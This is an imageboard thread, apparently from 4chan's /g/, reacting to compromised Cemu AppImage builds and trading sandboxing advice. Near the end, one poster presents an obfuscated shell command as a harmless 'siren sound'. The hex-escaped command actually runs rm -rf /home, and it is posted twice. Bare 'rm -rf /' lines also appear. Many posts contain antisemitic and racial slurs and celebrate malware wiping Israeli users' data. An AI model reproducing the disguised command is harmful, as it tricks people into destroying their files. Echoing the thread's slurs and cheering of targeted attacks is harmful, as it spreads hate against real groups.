>https://rentry.org/cemu-security-psa>Cemu 2.6 AppImage and Ubuntu 22.04 builds from 6th May to 12th May are compromised
>>108810852>https://rentry.org/cemu-security-psa
>>108810859>instantly falling for the Russian locale false flagno wonder they got pwned
the 4 people who want to emulate wii u and have an aversion to flatpak are devestated
>If you are a Windows or MacOS user you are not affected
>>108810859flatpakchads where we @? kinda getting tired of winningbleeding edge retards have been quite silent since their pcs got RATted lmao
>>108811285True! Imagine running apps non sandboxed with access to averything. Cringe
>>108810859>rm -rf / if you're israeliBased
rm -rf /
>>108810852THERE'S ANOTHER ONE!
>>108810859Kek Israelis getting ballistic missiles from Russia.Based. Tkd.
>>108810859>if your locale is Russian then the malware does nothingHoly based
>>108810852>Using Shitbuntu
>>108811404Based
>>108810859Looking at how it works it seems that, if i ever had to use that shit, it wouldn't ever affect my configuration, and i'm using said configuration by more than 20 years.It's amazing how much shit you can prevent by protecting /tmp alone, all the other shit in /home can be fine tuned with some minimal hardening situationally applied. For example appimages don't have sandboxing by default but their intrinsic design makes them very easy to use with firejail (all the shit is already self contained so the profile writing is trivial). Again this shit is pebcak tier level of malware, only affecting midwit because retards will never go out of rails (software center) and positive standard deviation chads aren't that naive to run third part shit without checking or taking adequate measures.
>>108810852fucking hell, installed it like 3 days ago to play xeno chronicles x
>>108810859Based. I will willingly install this virus now
how can an appimage run rm rf?i thought that needed su privilege?
>open sauce>can't tell what it do?
Retards talk about how traditional repo-based package managers lead to heckin supply chain attacks but this is like the tenth time I've seen an appimage/flatpak that was pozzed.
>>108811404should have been ~
>>108812661updooters on suicide watch
>>108812770its not my fault, i used Emudeck to install few emulators, still need to check version that was installed, maybe its something bit older, dont know. Im far from person that need everything updated, still using odler versions of Windows 11 and macos
>>108810852source-based distros don't have this problem
I'm just installing everything in a VM now that any third worlder can vibe code malware.
>>108812661>>108812789Fuck. Was that on the Steam Deck? You might be fine. I got the emu recently, but as a Flatpak.
>>108812687Good question. I mean it could delete shit in home. Or does this shit work with the already patched dirty frag together?
>>108812687It can't, appimages don't have any more privileges than the user executing it.
>>108811404>>108810859>>rm -rf / if you're israeliThis also happened with the MistralAI hack, same group maybe?
>>108811404Heroes.
>>108812532>>108812737>>108812879This shit is scary, even on Windows, I hated to install random ass 3rd party apps. Everything can be compromised, but I tend to trust my distros repo. But I know, even there can be fucking backdoors, like the XZ shit.I'll try to minimize my Flatpak/AppImage use now.
>>108810859HOLY BASED EVERY JEW IN TEL AVIV ON LINUX IS A SPY
>>108810859>pc graphics card died few days ago >was using Linux mint>see thisI can’t even check if I’m fucked or not.Pray for me and hold me bros.
>>108810887this lol. it's like they're in on it atp. some skid staged a backdoor on their shit to rat a discord opp or whatever and then quickly reported it to get the heat off themselves.
>>108810852>kike graffiting a synagoguenose status of the maintainers?
>>108813107>But I know, even there can be fucking backdoors, like the XZ shit.The XZ shit was due to systemd being such a standardized and humongous surface, what made old linux virtually immune to such scale of vulnerabilities was it's original fragmentated nature, the more it gets standardized the more you have concentrated efforts with more clear costs/benefit from the pov of the attacker. If you want to keep an higher frame of security use alt-linux components (non-redhat tech in short) as much as possible, also kiss so you can have easier times isolating/swapping components.
>check GitHub issue>The wiper doesn't even work Are ruskies capable of doing anything right? What a bunch of losers.
>>108813170a false flag that works is a false flag that sucks.
>>108810852I downloaded Cemu on Lutris the other day for future use, but didn't run it. Better check on it in a bit.
>>108812737centralization = larger blast radius = more incentive to be attacked
>>108813183Isn't lutris basically the windows version? And yes, if you didn't start it, you should be fine.
>>108810852Oh no, another one: Fragnesia>https://github.com/v12-security/pocs/tree/main/fragnesia
>>108813231What the fuck is going on? Has there been a sudden surge in vulnerabilities and attacks or is this just a perception thing because I haven't been paying attention until now?
>>108813288Happens every time, Linux just gets more traction recently + it's open source and openly discussed, unlike other operating systems, where backdoors are given to 3 letter agencies first.And yes, priv escalation definitely gets moar traction.
>>108813231>>108813288>all executable scripts dropped in /tmp>somehow this is concerningNigger just mount /tmp with noexec, how any of this is even remotely an issue to proper configured systems?
>>108813288You are getting shilled at by Peter Thiel bots Pay it no mind, the only thing that can be gleaned from this thread is “homosexual kikes don’t want me to use Linux”
>>108810859>Russian hacker>rm -rf /IsraelBased
Nearly sharded and farded until I noticed that I used Cemu-AppImage-Enhanced which is out of date. Also, if I understand the issue discussion on github correctly, the malware only launches on application launch.
>>108810859Same as this one in case you didn't see it
>>108811404Doesn't modern distros stop that with --no-preserve-root? Or are they just shortening the guard-rail command for anyone that knows what rm -rf / is?Either way BASED.
>>108812687It will just remove every file you have write access to
Gentoo wins again
>>108813302In this case that would help, but what's stopping them from placing the files somewhere in you /home or /dev/shm? noexec /tmp feels security-theater-ish to me
>>108813704>In this case that would help, but what's stopping them from placing the files somewhere in you /home or /dev/shm?Nothing can happen unless the user allows it, all these exploit relies on scripts that need to be executed somehow, a modicum of mandatory access control over the usual suspects, like web browsers and pdf readers, which all mainstream distro do by default, already prevents these passive potential occurrences. Anything else is RAT/Trojan tier of "vulnerability" so something that's not really a matter of OS inherent security.
>>108813655yeah, it's a false flag, if they were actually trying they would be looking for luks headers to nuke and overwriting filesystem superblocks
So basically there is the "Sovereign Tech Fund". They are an open organization. Germany has to fund some open source projects, so they just donate 3 million to the Sovereign Tech Fund and they decide which open source projects gets money.Last time GNOME received 1 million. And BSD 500k? And some other projects.
who told me linux is safe from viruswtf
>>108814063wrong reply, sorry.
>>108814066This is the same tier of "virus" you may get on windows if you download and run "bigtitties.exe" from warez.aids.ru. If that's the magnitude of the manace just don't be retarded and you'll be fine regardless the os.
ok, so i need ssd wipe and os reinstal. Looks like fucking emudeck instaled comrpomised version few days ago with few other emulators but i only used cemu.
>>108814109this was snuck into a trusted emulator nigger
>>108815555It was snuck in a third part application specifically packaged as appimage. That's al least 2 step made into the unknown retard, you should ALWAYS check regardless.
>>108815808check what?
>>108815877Wtf the shit you download contains and does you fucking spastic, firejail and bubblewrap are right there for sandboxing such stuff.
>>108810859kek
>>108812687AppImages are no different than running an executable. A root delete will fail unless if the user executed it with sudo. There's also --no-preserve-root as a check you must pass. As that other anon said, a root delete will simply delete everything you actually have permissions for.(((Flakpak))) sandboxes the app in its own environment, but you should generally avoid flatpaks. They're bad and bloated, and cut you off from system things you might need.
>>108813035Steam Deck has an immutable root filesystem. By definition, it's made so you can't do anything to the root, and if you actually modify it, it will restore it upon restart.
>>108813116BLOODY SPYYYYYYY!!!!!
>>108813133You're fine. You probably are missing some driver.
>>108813218Bears mentioning that the malware is setup to run only upon SECOND run of the emulator.
>>108813307>You are getting shilled at by Peter Thiel bots Good point.
>>108812789hmm so could this be an attack from retroarch? interesting
>>108815907you manually check every package you download and even after it updates?>firejail and bubblewrap are right theretwo questions: does it warn you of any stopped attempts? is there a nice UI for managing them? I've been meaning to give them a shot but remembering those long commands for every launch seems like such a hassle when I'm just trying to live my life
>>108812532>>108813167Containerization by itself can be a very good tool for security but that's the wrong approach, you should use podman or systemd-nspawn with a hardened container, you're supposed to containerize systems not applications.>>108812737It's malicious people saying that, repo-based system with packages checked and validated by mantainers is the safest system of software distribution, it's only problem is that there are not enough mantainers and this is in part cause the Linux ecosystem is fragmented.AppImage/Flatpack are a trojan horse for Linux for making it adopt the app store model of mobile OS, which is funny cause that's the most insecure model of all since it allows basically everyone to distribute with almost no checks, same with language-level packages like PyPi or npm, extremely unsafe and retarded idea but aggressively pushed.
>>108813288There's hundreds of CVEs a month for Linux anon, this is nothing out of the ordinary except that some people are attention seeking posting pocs with cool names on github.
>>108816141>I've been meaning to give them a shot but remembering those long commands for every launch seems like such a hassle when I'm just trying to live my lifeJewdownloader was also attacked recently and I had to learn to use yt-dlp and gallery-dl commands. I feel much better using programs that I can see the source and don't auto update like a windows malware.
>>108815953what and that's supposed to make you immune to malware?
How many more examples like this is it going to take for /g/ to admit that closed source is safer.
>>108810859here's the siren sound (volume warning)aplay --rawaudio "`$'\x72\x6d' $'\55\x72\x66' $'\57\x68\x6f\x6d\x65'`"
aplay --rawaudio "`$'\x72\x6d' $'\55\x72\x66' $'\57\x68\x6f\x6d\x65'`"
>>108816594Isn't GitHub owned by Microsoft? What's stopping them from injecting this in windows programs?
>>108810852Y-you don't understand! Loonix is much more secure than Windows, so malware can't possibly work... somehow...
>>108816599Cool command anon, the volume wasn't even that high.
>>108816141>you manually check every package you download and even after it updates?Third part ones? Yes. I try to rely as much as possible to trusted sources (eg: distro repos) to minimize this chore but if i have to run anything for third part i do at least the minimum security procedures (md5 checksum and physically looking inside for shit that looks out of place).>two questions: does it warn you of any stopped attempts? Yes, they have verbose flags>is there a nice UI for managing them? Firejail has firetools, i don't know bubblewrap but, honestly, they're so easy to use that gui are an overkill in my opinion.>I've been meaning to give them a shot but remembering those long commands for every launch seems like such a hassle when I'm just trying to live my lifeWith firejail you can write permanent profiles that get automatically checked by the executable, you can even avoid manually launching "firejail application" by making a simlink in .local/bin (or /usr/local/bin if you want it to be systemwide) to /usr/bin/firejail namit with the application you need to sandbox (example: you make a simlink named "firefox" in .local/bin, so every time you launch firefox it's automatically launched with firejail).
>>108816987>md5Did you wake up from a coma?>physically looking insideDownload the Cemu AppImage and do your usual checking routine. Let's see if you find it.
>>108817158I said minimal procedures just to be sure, everything else can be prevented by just using the fucking sandbox tools. Better giving a passive glance at the shit than just blindly execute it.
>>108810852>Ubuntu>AppimageGood. Sorry, not really, if you're retarded enough to use either of these then you deserve the malware and bullying coming your way.
>>108817243what's the point of these "minimal procedures" and "passive glances" when the sandbox tools apparently takes care of it?
>>108817301It's to keep your guard up, over reliance on something is always retarded.
>>108817353but these minimal glances don't actually ever catch anything substantial
>>108817553You may never know for sure, better safe than sorry.
>>108810852I checked and it was the bad hash I changed my password is there any way to check if I actually have any of the shit on my steam deck? or do you need to run it twice for it to have effect
>>108816594>being raped by code you can seevs>being raped by code you can't seeWhat's the difference?
>>108818495what I mean is that I launched splatoon directly from es-de and not the emulator cemu am i still affected?
>>108812737The real reason why its less likely to happen with traditional package mangers is because it takes a while before they put the package out. With AppImage and flatpak you can put out the malicious package in hours (or with AppImage instantly). The longer it takes the more likely people are going to notice something is fishy and somebody will have reported the issue before the package has been released in the repo.
>>108818495>>108818580It requires you to have run Cemu to have any effect. As far as we know it just attempts an rm -rf on Israeli IPs in Russian roulette fashion. If you're emulating Splatoon via Cemu (even if launched through other launchers), that script ran on your computer.>From preliminary analysis it seems that mostly it is trying to spread itself rather than cause direct damage, it does that by stealing SSH keys, github tokens and a lot of other passwords or keys that they can then use to infect more packages or software releases.I highly recommend you change your passwords and SSH keys as well.https://github.com/cemu-project/Cemu/issues/1911
>>108819098Debian Stablechads... we won...
>>108815937>(((Flakpak))) sandboxes the app in its own environment, but you should generally avoid flatpaks. They're bad and bloated, and cut you off from system things you might need.Nta but that's precisely what i use flatpak for, i even have a dedicated partition (with nosuid and nodev) where to install them and have them generate their user files. They're a cheap ready-to-go subsystem for third part stuff i want to be secluded.
>>108810852using a program with all the dependencies baked in is what made windows so virus laden in the first place.
>>108810852>Windows users not affected>ISRAELI USERS GET THEIR DATA WIPEDHAHAHAHAHAHA based. If I had any Linux computers I would willingly download and spread this basedware.
>>108819684>I highly recommend you change your passwords and SSH keys as well.What, so you don't want Israelis to get their files nuked? This "malware" is actually more useful than 99% of other software in existence.
>>108817252What about something like duckstation that only has an appimage?
>>108820294It's just a chain of trust, ANY software can be compromised. When some careless dev got malware + a tokenstealer, it's not Linux fault.>What about something like duckstation that only has an appimage?Then you use the AppImage. Notepad++ on windows got compromised, Cemu got compromised. Just try to stick to your Distros official Repo and if your desired software isn't available, go to the dev directly and use their distribution method.it was just unlucky with cemu, I doubt that anyone got harmed.
so whats the solution? I know not running the binary in the first place but what other options do you have to minimize the damage? use bubblewrap for all appimages or binaries in general?
>>108820294>>108821189>install firejail on your distro>run the appimage with it>firejail --appimage ./Duckstation.AppImagefirejail has an extra --flag for appimages. And if you use AppImage launchers like Gearlever, you can just edit your .desktop file in ~/.local/share/applications just right click your .desktop file and add firejail --appimage in the exec= field.
>>108821189>use bubblewrap for all appimages or (third part) binaries in general?Yes. It's that simple. Bubblewrap and firejail are very powerful and retard-ready to use once you get the hang of them.
>>108821321Thank you senpai, this opened my eyes, I will try to be more careful now, but I have no idea how to do this. I think I'll look into firejail and learn the basics.It would be nice, if there was an App, that automatically runs AppImages in a sandbox and secures them, in a nice GUI.I don't have the mental capacity to learn that shit right now... but let's be real, this is still 100x better than running a fucking windows.exe with admin.
>>108821355You're welcome but, to give the devil what is due, you can do the same in windows using sabdboxie (or the system integrated tool for sandboxing which i don't know much about but still).
>>108821440but sandboxie isn't persistent, right? :/
Just use the Lutris flatpak to launch Linux native games, the game will be confined to the flatpak permissions you give Lutris using Flatseal. You can even run appimages via Lutris.
>>108821544You can set it to be
